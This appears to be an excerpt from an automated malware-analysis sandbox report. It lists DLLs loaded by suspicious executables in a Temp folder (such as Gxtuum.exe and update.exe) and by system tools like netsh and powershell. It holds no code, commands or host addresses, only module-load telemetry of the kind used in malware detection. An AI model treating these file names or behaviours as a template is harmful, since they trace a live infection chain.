Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Section loaded: libffi-7.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll
